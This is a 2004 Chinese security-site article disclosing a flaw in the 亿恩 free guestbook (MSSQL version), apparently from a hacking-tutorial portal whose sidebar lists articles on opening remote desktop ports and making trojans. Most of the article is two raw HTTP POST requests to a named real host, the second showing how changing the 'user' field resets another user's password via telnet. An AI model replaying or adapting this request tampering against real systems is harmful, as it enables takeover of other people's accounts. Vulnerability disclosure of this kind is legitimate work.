网络软件 系统工具 应用软件 图形图像 多媒体类 免费游戏 安全相关 免费音乐 网页素材 电子书籍 考试考题 建站源码
教育教学 多媒体类 编程开发 操作系统 游戏天地 娱乐天地 简历求职 站长专区 网页设计 安全技术 图形图像 文学驿站
业界资讯 | 图形图像 | 操作系统 | 网络冲浪 | 工具软件 | 办公软件 | 媒体动画 | 精文荟萃 | 认证考试 | 网页设计 | 技术开发 | 专栏
当前位置:热点网络学院网络冲浪网络安全亿恩免费留言薄MSSQL版修改任意用户密码漏洞
精品推荐
热点TOP10
·检测和删除系统中的木马(Trojan Horse)教程
·开3389最简单得方法
·侵入最大的六合彩论坛系统---六合专用BBS
·135网络端口,禁用有巧招
·win2k的3389端口攻击
·一、如何在QQ/ICQ中隐藏IP地址
·端口详解(1)-端口分配表
·上网确保不会被攻击的5个窍门
·总结开3389的5种方法
·nc.exe高级技巧应用汇总
·狙击4899肉鸡
·如何关闭端口防止病毒与黑客入侵
·如何防止黒客远程盗取QQ密码
·查看开放端口:让木马现形
·高手教你实测无线路由器的安全功能
·女黑客雪蓓新作:自己丰衣足食—菜鸟制作木马的旅程
·抵御黑客入侵防护服务器安全的七个技巧
·端口·木马·安全·扫描应用知识概览
·恢复本来面目 消除JPEG图片马赛克
·端口详解(2)-端口的分类
亿恩免费留言薄MSSQL版修改任意用户密码漏洞
日期:2004年4月1日 作者:热点网络学院 查看:[大字体 中字体 小字体]
亿恩免费留言薄MSSQL版修改任意用户密码漏洞
漏洞为高风险

比如:
http://enkj.com/gbook/guestbook.asp?user=bingel
这个是我自己申请用来做测试的免费留言簿

我申请完之后进入修改一下密码

用winsock expert 捕获了如下数据

POST http://enkj.com/gbook/modifyok.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword,

application/vnd.ms-powerpoint, application/vnd.ms-excel, */*
Referer: http://enkj.com/gbook/modify.asp?edit=ok
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: enkj.com
Content-Length: 122
Pragma: no-cache
Cookie: ASPSESSIONIDCQASSDQA=JHCEGLHCBINJDFOLDAHMKMNG
user=bingel&pass=123456789&zhanzhang=bingel&kind=1&email=binghen@hotmail.com
&web=fuck&url=http%3A%2F%2Fsafdafda.com&intro=

这上面一个是关键的东东.

有了这个东东你就可以修改任意用户的密码了

比如你要修改一个用户名为lin的用户的留言簿的密码.只要

telnet enkj.com 80

然后发送post如下数据就可以了.

POST http://enkj.com/gbook/modifyok.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword,

application/vnd.ms-powerpoint, application/vnd.ms-excel, */*
Referer: http://enkj.com/gbook/modify.asp?edit=ok
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: enkj.com
Content-Length: 122
Pragma: no-cache
Cookie: ASPSESSIONIDCQASSDQA=JHCEGLHCBINJDFOLDAHMKMNG

user=lin&pass=123456789&zhanzhang=bingel&kind=1&email=binghen@hotmail.com&web=fuck
&url=http%3A%2F%2Fsafdafda.com&intro=

这样就把用户名为lin的用户的密码修改为123456789

其它的没有必要多说,大家看看就知道是怎么回事了.这个漏洞也只是偶然发现.没有什么技术可言.只是给大家一个提醒.
网络上没有绝对的安全.

(出处:http://www.vipcn.com

关于我们 | 帮助(?) | 版权声明 | 友情连接 
Copyright 2005-2005 viphot.com All Rights Reserved.
Powered by:mesky